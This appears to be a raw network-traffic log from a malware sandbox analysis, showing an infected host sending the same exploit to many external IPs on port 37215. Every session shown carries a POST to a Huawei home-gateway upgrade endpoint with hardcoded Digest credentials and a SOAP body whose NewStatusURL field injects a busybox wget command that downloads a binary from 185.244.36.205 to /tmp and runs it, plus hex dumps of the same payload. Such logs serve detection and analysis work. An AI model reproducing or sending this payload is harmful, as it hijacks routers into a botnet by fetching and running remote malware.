                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              355192.168.2.1547658122.102.192.19537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.717919111 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              356192.168.2.1558758157.73.21.13137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.717935085 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              357192.168.2.155960642.113.178.13637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.717963934 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              358192.168.2.1552936122.118.252.10737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.717978001 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              359192.168.2.1540338138.227.119.1337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.718004942 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              360192.168.2.155556637.254.95.10737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.718019009 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              361192.168.2.1546512156.70.145.8837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.718019009 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              362192.168.2.1541112121.211.5.16937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.718034983 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              363192.168.2.1560976185.195.130.17837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.718051910 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              364192.168.2.1550836186.17.222.13637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.718067884 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              365192.168.2.155728269.53.35.13237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.718079090 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
